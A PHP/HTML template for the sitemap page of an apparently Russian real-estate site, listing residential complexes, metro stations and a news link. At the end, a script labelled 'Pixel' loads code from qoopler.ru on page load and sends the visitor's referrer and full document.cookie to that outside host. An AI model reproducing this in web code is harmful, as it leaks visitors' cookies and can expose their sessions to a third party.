<!DOCTYPE html>
<html lang="ru">

    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
      <meta http-equiv="X-UA-Compatible" content="ie=edge">
      <link href="/assets/css/style.css?v=<?=filemtime($_SERVER['DOCUMENT_ROOT'].'/assets/css/style.css')?>" rel="stylesheet">

      <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
      <title>Карта сайта</title>
    </head>
        <body>
            <div style="display:none">
                <include src="/assets/img/sprite.svg"></include>
            </div>
            <header class="header-catalog">
                <img src="/assets/img/close__btn.png" alt="">
                <div class="header-catalog__wrap">
                    <div class="header-catalog__logo">
                        <a href="/"><img src="/assets/img/logo.svg" alt="logo"></a>
                    </div>
                    <div class="sort-box__title-box">
                        <h2 class="title">Карта сайта</h2>

                    </div>
                </div>
                <hr class="hr"></hr>
            </header> 
            <main>
                <section class="blog news">
                    <div class="blog__wrapper">
                        <ul class="sitemap">
                            <li><a href="/">Главная</a></li>
                            <li>
                                <a href="/catalog">Каталог</a>
                                <?php
                                if(!empty($blocks)){
                                    ?>
                                <ul class="pod_ul">
                                    <?php
                                    foreach($blocks as $block){
                                        ?>
                                        <li><a href="/zhk/<?=$block->slug?>">ЖК <?=$block->name?></a></li>
                                        <?php
                                    }
                                    ?>
                                </ul>
                            </li>    
                                <?php
                                } 
                                if(!empty($metros)){
                                    ?>
                            
                            <li>
                                <a href="">Метро</a>
                                <ul class="pod_ul">
                                    <?php
                                    foreach($metros as $metro){
                                        ?>
                                        <li><a href="/catalog/metro/<?=$metro->slug?>"><?=$metro->name?></a></li>
                                        <?php
                                    }
                                    ?>
                                </ul>
                                
                            
                            </li>
                            <?php
                                    
                                }
                                ?>
                            <li>Новости
                                <ul class="pod_ul">
                                    <li><a href="/news/mk2020">Материнский капитал в 2020</a></li>
                                </ul>
                            </li>
                        </ul>
                    </div>    
                </section>
            </main>
            <!-- Pixel -->
   <script type="text/javascript">
        (function (d, w) {
            var n = d.getElementsByTagName("script")[0],
                s = d.createElement("script"),
                f = function () { n.parentNode.insertBefore(s, n); };
                    s.type = "text/javascript";
                    s.async = true;
                    s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie);

                    if (w.opera == "[object Opera]") {
                        d.addEventListener("DOMContentLoaded", f, false);
                    } else { f(); }
        })(document, window);
    </script>
    <!-- /Pixel -->
        </body>
       
    
</html>
